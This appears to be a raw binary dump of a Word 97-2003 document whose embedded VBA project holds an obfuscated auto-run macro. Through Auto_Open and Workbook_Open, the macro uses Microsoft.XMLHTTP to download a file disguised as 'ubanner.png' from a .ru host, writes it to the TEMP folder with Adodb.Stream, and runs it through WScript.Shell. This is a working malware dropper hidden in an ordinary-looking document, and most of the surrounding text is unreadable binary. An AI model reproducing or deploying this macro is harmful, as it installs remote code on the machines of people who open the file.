\0\0\0\0\0\0\0\0\0\0\0\0\04\x10\0\0\0\0\0\0\x05\0S\0u\0m\0m\0a\0r\0y\0I\0n\0f\0o\0r\0m\0a\0t\0i\0o\0n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0\x02\x01ÿÿÿÿÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"\0\0\0\0\x10\0\0\0\0\0\0\x05\0D\0o\0c\0u\0m\0e\0n\0t\0S\0u\0m\0m\0a\0r\0y\0I\0n\0f\0o\0r\0m\0a\0t\0i\0o\0n\0\0\0\0\0\0\0\0\0\0\08\0\x02\x01\x04\0\0\0ÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0*\0\0\0\0\x10\0\0\0\0\0\0M\0a\0c\0r\0o\0s\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x0e\0\x01\x01\x02\0\0\0\r\0\0\0\v\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10ª;JÛÏ\x01\x10ª;JÛÏ\x01\0\0\0\0\0\0\0\0\0\0\0\0V\0B\0A\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\b\0\x01\0ÿÿÿÿÿÿÿÿ	\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10ª;JÛÏ\x01\x10ª;JÛÏ\x01\0\0\0\0\0\0\0\0\0\0\0\0d\0i\0r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\b\0\x02\0ÿÿÿÿÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\v\x02\0\0\0\0\0\0T\0h\0i\0s\0D\0o\0c\0u\0m\0e\0n\0t\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1a\0\x02\x01\b\0\0\0
\0\0\0ÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0	\0\0\0\x0f\r\0\0\0\0\0\0_\0V\0B\0A\0_\0P\0R\0O\0J\0E\0C\0T\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1a\0\x02\0ÿÿÿÿÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0>\0\0\0(
\0\0\0\0\0\0P\0R\0O\0J\0E\0C\0T\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10\0\x02\x01\a\0\0\0\f\0\0\0ÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0g\0\0\0t\x01\0\0\0\0\0\0\x01\0\0\0\x02\0\0\0\x03\0\0\0\x04\0\0\0\x05\0\0\0\x06\0\0\0\a\0\0\0\b\0\0\0þÿÿÿ
\0\0\0\v\0\0\0\f\0\0\0\r\0\0\0\x0e\0\0\0\x0f\0\0\0\x10\0\0\0\x11\0\0\0\x12\0\0\0\x13\0\0\0\x14\0\0\0\x15\0\0\0\x16\0\0\0\x17\0\0\0\x18\0\0\0\x19\0\0\0\x1a\0\0\0^[\0\0\0\x1c\0\0\0\x1d\0\0\0\x1e\0\0\0\x1f\0\0\0 \0\0\0!\0\0\0"\0\0\0#\0\0\0$\0\0\0%\0\0\0&\0\0\0'\0\0\0(\0\0\0)\0\0\0*\0\0\0+\0\0\0,\0\0\0-\0\0\0.\0\0\0/\0\0\00\0\0\01\0\0\02\0\0\03\0\0\04\0\0\05\0\0\06\0\0\07\0\0\08\0\0\09\0\0\0:\0\0\0;\0\0\0<\0\0\0=\0\0\0þÿÿÿ?\0\0\0@\0\0\0A\0\0\0B\0\0\0C\0\0\0D\0\0\0E\0\0\0F\0\0\0G\0\0\0H\0\0\0I\0\0\0J\0\0\0K\0\0\0L\0\0\0M\0\0\0N\0\0\0O\0\0\0P\0\0\0Q\0\0\0R\0\0\0S\0\0\0T\0\0\0U\0\0\0V\0\0\0W\0\0\0X\0\0\0Y\0\0\0Z\0\0\0[\0\0\0\\0\0\0]\0\0\0^\0\0\0_\0\0\0`\0\0\0a\0\0\0b\0\0\0c\0\0\0d\0\0\0e\0\0\0f\0\0\0þÿÿÿh\0\0\0i\0\0\0j\0\0\0k\0\0\0l\0\0\0þÿÿÿþÿÿÿo\0\0\0þÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ\x01\a²€\x01\0\x04\0\0\0\x01\00*\x02\x02	\0p\x14\x06H\x03\0‚\x02\0dã\x04\x04\0\a\0\x1c\0Project\x05Q\0(\0\0@\x02\x14\x06\x02\x14=­\x02
\a\x02l\x01\x14\b\x06\x12	\x02\x12€@}àU\x02\0\f\x02J\x12<\x02
\x16\0\x01rstd\x10ole>\x02\x19s\0t\0\0d\0o\0l\0eP\0\r\0h\0%^\0\x03*\0\G{00020°430-\0\b\x04\x04C\0
\x03\x02\x0e\x01\x120046}#\02.0#0#C:\0\Windows\0\SysWow6\x044\\x03e2.tlb\0#OLE Aut€omation\0`\x03\0\x02ƒENormal\x05ƒEN€Cr\0m\0aQ€F\x0e\0 €\x11	€\x01*\f\C\x03\x12
\x06•’ÁU\x04\x04\0ƒ!Offic\x11„gO\0f€\0i\0c\x15‚g¤€\x1fš‚!G{2\0DF8D04C-\05BFA-101@B-BDE5€gAjA€e4€\x052ˆg€ºg\0ram File\0s (x86)\@Common\x03	\\0Microsof\0t Shared\0\OFFICE1\01\MSO.DL\fL#‡\x10ƒP 11.\x100 Obæ Li`brary\0'€\0\x0f\x11\x02|\x01\0\x13Â\x01ͧ\x19\x01ÂfThisDoc\0umentG\0\x18\x05À	T@hi\0s\0D\x11@Jc\0uÀJe\0nU@p\x1aÎ\v2Ú\v\x1cÀ\x12\0\x14\0HB\x011ŠO
\0,\0\x1eB\x02\x01\x05,Â!×ç*"B\b+B\x01\x10B\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\x16\x01\0\x01ð\0\0\0Î\x04\0\0Ô\0\0\0Ú\x01\0\0ÿÿÿÿÕ\x04\0\0I
\0\0\0\0\0\0\x01\0\0\0ͧ×ç\0\0ÿÿ£\0\0\0ˆ\0\0\0¶\0ÿÿ\x01\x01\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x10\0\0\0\x03\0\0\0\x05\0\0\0\a\0\0\0ÿÿÿÿÿÿÿÿ\x01\x01\b\0\0\0ÿÿÿÿx\0\0\0\b\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0ÿÿ\0\0\0\0ME\0\0ÿÿÿÿÿÿ\0\0\0\0ÿÿ\0\0\0\0ÿÿ\x01\x01\0\0\0\0ß\0ÿÿ\0\0\0\0\f\0ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ(\0\0\0\x02\0S"ÿÿÿÿ\0\0\x01\0S\x10ÿÿÿÿ\0\0\x01\0S"ÿÿÿÿ\0\0\0\0\x02<ÿÿÿÿ\0\0ÿÿ\x01\x01\0\0\0\0\x01\0(\01\0N\0o\0r\0m\0a\0l\0.\0T\0h\0i\0s\0D\0o\0c\0u\0m\0e\0n\0t\0\b\0\0\0ÿÿÿÿ\x01\x01h\x02\0\0\f\x11\x18\x02@\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿÿÿÿÿÿÿÿÿ\x03\0\x03\0\0\0”\0\0\x02\0\0\f\x11\x1c\x02€\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿÿÿÿÿÿÿÿÿ\x03\0\x03\0\0\0”\0\0\x02\0\0\f\x11\x1e\x02À\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿÿÿÿÿÿÿÿÿ\x03\0\x03\0\0\0”\0\0\x02\0\0\f\x11\x1a\x02ÿÿÿÿÿÿÿÿ\0\0\0\0ÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0ÿÿÿÿ\0\0\0\0ÿÿÿÿÿÿÿÿÿÿÿÿ%\0%\0\0\0”\0\0\x02\0\0`„ \x02ÿÿÿÿÿÿÿÿ\b\0ÿÿ\0\0\0\0\0\0\0\0`„"\x02ÿÿÿÿÿÿÿÿ\x02\0ÿÿ\0\0\0\0\0\0\0\0`„$\x02ÿÿÿÿÿÿÿÿ\x02\0ÿÿ\0\0\0\0\0\0\0\0@„&\x02ÿÿÿÿÿÿÿÿ\f\0ÿÿ\0\0\0\0\0\0\0\0@„,\x02ÿÿÿÿÿÿÿÿ\f\0ÿÿ\0\0\0\0\0\0\0\0@„.\x02ÿÿÿÿÿÿÿÿ\f\0ÿÿ\0\0\0\0\0\0\0\0 „6\x02ÿÿÿÿÿÿÿÿÀ\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^[\b¨\x01\0\0\x03\0`„8\x02ÿÿÿÿÿÿÿÿ\x03\0ÿÿ\0\0\0\0\0\0\0\0`„:\x02ÿÿÿÿÿÿÿÿ\x03\0ÿÿ\0\0\0\0\0\0\0\0`„¤\0ÿÿÿÿÿÿÿÿ\x03\0ÿÿ\0\0\0\0\0\0\0\0\x02€þÿÿÿÿÿ\x10\0ÿÿ8\x02\0\0\x02\x01ÿÿ\x10\x02\0\0\0\0\0\0ÿÿÿÿÿÿÿÿ\0\0\0\0\x1d\0\0\0%\0\0\0@\0\0\0À\0\0\0ÿÿÿÿ€\0\0\0\0\0\0\0ÿÿÿÿÿÿÿÿ\0\0\0\0ÿÿÿÿ˜\x01\0\0\x04\0\x04\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0ÿÿÿÿÿÿÿÿ\x10\x02\0\0ÿÿÿÿÿÿÿÿÀ\0\0\0ÿÿÿÿÿÿÿÿ\x10\x02\0\0ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0ÿÿÿÿÿÿÿÿ\0\0\0\0ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ\a\0@\x02\0\0@}àU\x02\0ß\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0þÊ\x01\0.\0"\b\0\x06\0\0\0\0\0\0\0\0\b\x04\x06\0\0\0\b\0\0\0\x04\b\0\x02\0\0\0\x10\0\0\0"\b\0\x06\0\0\0\x18\0\0\0\0\b\x04\x06\0\0\0 \0\0\0\x04\b\0\x02\0\0\0(\0\0\0"\b\0\x06\0\0\00\0\0\0\0\b\x04\x06\0\0\08\0\0\0\x04\b\0\x02\0\0\0@\0\0\0"\b\0\x06\0\0\0H\0\0\0\0€\b\0\b\0\0\0P\0\0\0\0€\b\0\b\0\0\0X\0\0\0\0€\b\0\b\0\0\0`\0\0\0\0€\b\0\b\0\0\0h\0\0\0\0\b\06\0\0\0p\0\0\0\0\b\0\x06\0\0\0¨\0\0\0\0\b\0,\0\0\0È\x02\0\0\0\b\0\x06\0\0\0°\0\0\0\0€\b\0\b\0\0\0¸\0\0\0\0\b\06\0\0\0À\0\0\0\0\b\0*\0\0\0ø\0\0\0\0€\b\0\b\0\0\0(\x01\0\0\0\b\0\x06\0\0\00\x01\0\0\0\b\0.\0\0\08\x01\0\0\0\b\0\x06\0\0\0h\x01\0\0\0\b\0\x12\0\0\0p\x01\0\0\0\b\0\x18\0\0\0ˆ\x01\0\0\0\b\0
\0\0\0 \x01\0\0\0€\b\0\b\0\0\0°\x01\0\0\0€\b\0\x14\0\0\0¸\x01\0\0\0\b\0\x06\0\0\0Ð\x01\0\0\0\b\0\b\0\0\0Ø\x01\0\0\0\b\0\x06\0\0\0à\x01\0\0\0\b\0\b\0\0\0è\x01\0\0\0\b\0\x06\0\0\0ð\x01\0\0\0\b\06\0\0\0ø\x01\0\0\0\b\0\x06\0\0\00\x02\0\0\0\b\0\x06\0\0\08\x02\0\0\0\b\0\x0e\0\0\0@\x02\0\0\0\b\0\x06\0\0\0P\x02\0\0\0\b\0 \0\0\0X\x02\0\0\0\b\0\x02\0\0\0x\x02\0\0\0\b\0\x1a\0\0\0€\x02\0\0\0\b\0\x14\0\0\0 \x02\0\0\0\b\0\x06\0\0\0¸\x02\0\0\x04\b\0\x02\0\0\0À\x02\0\0ÿÿÿÿ\x01\x01\0\x03\0\0–\x04\0\0\0\0\0\0A@\x1a\x02\0\0\0\0o\0ÿÿh\0\0\0–\x04@\0\0\0\0\0A@\x18\x02\0\0\0\0o\0ÿÿP\0\0\0–\x04€\0\0\0\0\0A@\x18\x02\0\0\0\0o\0ÿÿ8\0\0\0–\x04À\0\0\0\0\0]\0ò\x04\0\x01\0\0]\0ò\x04\x18\x01\0\0]\0ò\x040\x01\0\0]\0ò\x04H\x01\0\0í\0¶\0\x01\0W\0¶\0\x02\0Sc\v\0¶\0\x04\0ript\v\0¶\0\x04\0.She\v\0¶\0\x02\0ll\v\0$\0(\x02\x01\0.\0&\x02\0\0A\04\x01\0\0\0\0A\04\x01\0\0\0\0]\0ò\x04`\x01\0\0í\0¶\0\x01\0W\0¶\0\x02\0Sc\v\0¶\0\x04\0ript\v\0¶\0\x04\0.She\v\0¶\0\x02\0ll\v\0$\0(\x02\x01\0.\0&\x02\0\0í\0¶\0\x04\0Adod¶\0\a\0b.Strea\0\v\0¶\0\x01\0m\0\v\0$\0(\x02\x01\0.\0,\x02\0\0\0\0\0\0]\0ò\x04x\x01\0\0A\04\x01\0\0\0\0í\0¶\0\x03\0Mic\0¶\0\x04\0roso\v\0¶\0
\0ft.XMLHTTP\v\0$\0(\x02\x01\0.\0.\x02\0\0A\04\x01\0\0\0\0¶\0\x04\0TEMP$\02\x02\x01\0'\00\x02\0\0\0\0\0\0¶\0\x03\0GET\0 \0*\x02·\0 \0.\x02B@\x16\x01\x03\0 \0.\x02B@4\x02\0\0\0\0\0\0\0\0]\0ò\x04\x01\0\0]\0ò\x04È\x01\0\0ò\x04à\x01\0\0ò\x04ø\x01\0\0\0\0\0\0A\04\x01\0\0\0\0\x01\x01 \0,\x02õ\0A\04\x01\0\0\0\0¬\0\x01\09\0l\x01A\04\x01\0\0\0\0í\0¶\0\x01\0W\0¶\0\x02\0Sc\v\0¶\0\x04\0ript\v\0¶\0\x04\0.She\v\0¶\0\x02\0ll\v\0$\0(\x02\x01\0.\0&\x02\0\0C@\x16\x01\0\0\0\0A\04\x01\0\0\0\0 \0.\x02!\0<\x02C@†\x01\x01\0\0\0A\04\x01\0\0\0\0 \00\x02¶\0\f\0\trhg4tv.com\x11\0¬\0\x02\0C@>\x02\x02\0q\0ÿÿ@\x01\0\0 \00\x02¶\0\f\0\trhg4tv.com\x11\0'\0@\x02\0\0\0\0\0\0 \0@\x02\x1d\0 \0D\x02 \0&\x02B@B\x02\x02\0\0\0\0\0A\04\x01\0\0\0\0o\0ÿÿø\0\0\0¶\0#\0LINKIFYeFaCBAFBccFJFEcEHaFaaJbEJdFFDJEGfDDAHJIJ\0'\0*\x02\0\0\0\0ÿÿÿÿ\0\x01\0\0ÿÿÿÿ\0\0\x01¼²\0Attribut\0e VB_Nam\0e = "Thi\0sDocumen\x10t"

ŒBas\x01\x02Œ1Normal\x02.\x19VGlobal!\x01ªSpac\x01lFa\blse\f¢Crea\x10tabl\x15\x1fPre decla\0\x06Id\x11\0žTru\rBExp\bose\x14\x1cTemp\0lateDeri\x02v\x15$Custom\fiz„Cƒ1Sub \0Auto_Ope@n()
 \0\0s\0mex
Endò \0\x0f
…\x11	\x11†\x19Œ\x13\0Workbook\x0fŠ'\x15\x1639Dim \0hU89tGOF€e3 As S\0Ù\x10ng
\fz7G\0fitrgoFI\x01\x01\rInteger\x01ƒ\rLjgf43t\x04FUŽ\fyD85tˆ9TF\0_et E\x03\x03ÀVÂbeObjec\0t("W" + \b"Sc‚\x01ript!\x02\x02.She\x02\x02ll\x02"ÀDCall R\x18andO\0fu6R\x02F@\x12"http:\0//freeim\0agehost.\0ru/ubannÀer.pngÀ–M\x0faB;bo34¿&C\x10hC\x01\x13N6AdodÂ0bÒ.@SeaÂ\x02m3\x01 @IVI_
&S'€JA\x06\x0e\x13MiDHos\x02o\x02\x12ft.XML\x10HTTP\x11HVe4\bvfC@\x11Envi\0ron("TEM\vB
A\x17.\x01’ "GET", ÁR, \x04Í!B\aSendCwarHr()AvLo\x05ƒiÑ…\x03, j‡\x02f…\x024`With "$o\x03.èTypAr1O\x03!!ŸFaG•F¢\x1cp\x0ewri@‘\x01"\x1drespons eBody0\x05SaÀveToFiÀ†\x04*\0& "\trhg€4tv.comÀ'\x062ão¡\x1c
hV_\x13`.t\x05
å\x19.Ru\bn (€\x05), vjbƒœF`¡so\x10f€\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Ìay\0\0\x01\0ÿ\x19\x04\0\0	\x04\0\0ã\x04\x01\0\0\0\0\0\0\0\0\0\x01\0\x05\0\x02\0ú\0*\0\\0G\0{\00\00\00\02\00\04\0E\0F\0-\00\00\00\00\0-\00\00\00\00\0-\0C\00\00\00\0-\00\00\00\00\00\00\00\00\00\00\04\06\0}\0#\04\0.\00\0#\09\0#\0C\0:\0\\0P\0R\0O\0G\0R\0A\0~\02\0\\0C\0O\0M\0M\0O\0N\0~\01\0\\0M\0I\0C\0R\0O\0S\0~\01\0\\0V\0B\0A\0\\0V\0B\0A\06\0\\0V\0B\0E\06\0.\0D\0L\0L\0#\0V\0i\0s\0u\0a\0l\0 \0B\0a\0s\0i\0c\0 \0F\0o\0r\0 \0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0s\0\0\0\0\0\0\0\0\0\0\0\0\0\x1e\x01*\0\\0G\0{\00\00\00\02\00\09\00\05\0-\00\00\00\00\0-\00\00\00\00\0-\0C\00\00\00\0-\00\00\00\00\00\00\00\00\00\00\04\06\0}\0#\08\0.\03\0#\00\0#\0C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0 \0(\0x\08\06\0)\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0 \0O\0f\0f\0i\0c\0e\05\0\\0O\0F\0F\0I\0C\0E\01\01\0\\0M\0S\0W\0O\0R\0D\0.\0O\0L\0B\0#\0M\0i\0c\0r\0o\0s\0o\0f\0t\0 \0W\0o\0r\0d\0 \01\01\0.\00\0 \0O\0b\0j\0e\0c\0t\0 \0L\0i\0b\0r\0a\0r\0y\0\0\0\0\0\0\0\0\0\0\0\0\0¼\0*\0\\0G\0{\00\00\00\02\00\04\03\00\0-\00\00\00\00\0-\00\00\00\00\0-\0C\00\00\00\0-\00\00\00\00\00\00\00\00\00\00\04\06\0}\0#\02\0.\00\0#\00\0#\0C\0:\0\\0W\0i\0n\0d\0o\0w\0s\0\\0S\0y\0s\0W\0o\0w\06\04\0\\0s\0t\0d\0o\0l\0e\02\0.\0t\0l\0b\0#\0O\0L\0E\0 \0A\0u\0t\0o\0m\0a\0t\0i\0o\0n\0\0\0\0\0\0\0\0\0\0\0\0\0\x12\0*\0\\0C\0N\0o\0r\0m\0a\0l\0\x12\0*\0\\0C\0N\0o\0r\0m\0a\0l\0•’ÁU\x04\0\0\0\0\0\0\04\x01*\0\\0G\0{\02\0D\0F\08\0D\00\04\0C\0-\05\0B\0F\0A\0-\01\00\01\0B\0-\0B\0D\0E\05\0-\00\00\0A\0A\00\00\04\04\0D\0E\05\02\0}\0#\02\0.\03\0#\00\0#\0C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0 \0(\0x\08\06\0)\0\\0C\0o\0m\0m\0o\0n\0 \0F\0i\0l\0e\0s\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0 \0S\0h\0a\0r\0e\0d\0\\0O\0F\0F\0I\0C\0E\01\01\0\\0M\0S\0O\0.\0D\0L\0L\0#\0M\0i\0c\0r\0o\0s\0o\0f\0t\0 \0O\0f\0f\0i\0c\0e\0 \01\01\0.\00\0 \0O\0b\0j\0e\0c\0t\0 \0L\0i\0b\0r\0a\0r\0y\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x02\0\x04\0\x04\x02\0\0\x06\x02\x01\0\b\x02\0\0
\x02\x01\0\f\x02ÿÿÿÿÿÿ\0\0\0\0ÿÿ\0\0@}àU\x02\0ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ\0\0ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0ͧ\x01\0\x18\0T\0h\0i\0s\0D\0o\0c\0u\0m\0e\0n\0t\0\x14\00\01\05\05\0e\00\07\0d\0c\07\0ÿÿ\x15\x02\x18\0T\0h\0i\0s\0D\0o\0c\0u\0m\0e\0n\0t\0ÿÿ×ç\0\0\0\0\0\0\0\x02\0\0\0O
\0\0ÿÿÿÿÿÿ\x01\x01 \x02\0\0ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ\0\x02\0\0ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ\x1fñ嫘ҩL•ò\x0fF¿Ü´vÿÿÿÿ\x01\0\0\0ÿÿÿÿ`\0\0\0€\0\0\0\0\0#\x01&\0ÿ\0\b)\0\0\0\0Q\0\x01„\x18\0ÿ\x03\0\0f\0\0Â\0\x05€\x14\0ÿ\x03\0\0write\x04\x04WordS10\0\x03\x04VBA÷â0\0\x05\x04Win16\x100\0\x05\x04Win32Õ\x100\0\x03\x04Mac³²0\0\x04\x04VBA6­#0\0\a\x04Project-®0\0\x06\0stdole“`0\0\x06€\0\0ÿ\x03\x03\0NormalßØ0\0\x06€\0\0ÿ\x03\x03\0Office\x15u0\0\f\x04ThisDocument<ž0\0	€\0\0ÿ\x03\x03\0_Evaluate\x18Ù0\0	\x04Auto_OpenV 0\0\x04\x04smex\x1d\x0e0\0\b\x04AutoOpenÙ*0\0\r\x04Workbook_Open\f0\0
\x04hU89tGOFe3	0\0\v\x04z7GfitrgoFIJ\r0\0	\x04Ljgf43tFUÓ«0\0\b\x04yD85t9TF©\r0\0\f\0CreateObjectøŠ0\0\x04\0u6RFh 0\0\x05\x04hbo34Ô!0\0\x04\x04IVI_/†0\0\x06\0Ve4vfCÜá0\0\a\0Environ^[,0\0\x04\0SendÍä0\0\x03\x04arr\vu0\0\x01\x04i`\x100\0\x01\x04ja\x100\0\f\0responseBodyTÄ0\0
\0SaveToFile\x1e_0\0\x03\0hV_^[›0\0\x03\0Run_Ð0\0\r\0vbNormalFocus¦ù0\0\b\x04DocumentjÓ0\0\x02ÿÿ\x01\x01T\0\0\0\x15\x02\0\0\0\0ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ\0\x02\x01\0ÿÿ\x02\x02\0\0ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ\f\x02ÿÿÿÿ\x0e\x02\x02\0ÿÿ\x10\x02\x03\0ÿÿ\x12\x02\x04\0ÿÿ\0\0\x0e\0\0\0\x01\0\x12\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0ID="{7801E498-DE2A-4B9B-82B2-6F1E51D78727}"
Document=ThisDocument/&H00000000
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="8C8E50E6507654765476547654"
DPB="181AC4F7C5F7C5F7"
GC="A4A6780E889B899B8964"

[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

[Workspace]
ThisDocument=44, 44, 1215, 585, Z
\0\0\0\0\0\0\0\0\0\0\0\0ThisDocument\0T\0h\0i\0s\0D\0o\0c\0u\0m\0e\0n\0t\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0þÿ\x03
\0\0ÿÿÿÿ\x06	\x02\0\0\0\0\0À\0\0\0\0\0\0F'\0\0\0Äîêóìåíò Microsoft Office Word 97-2003\0
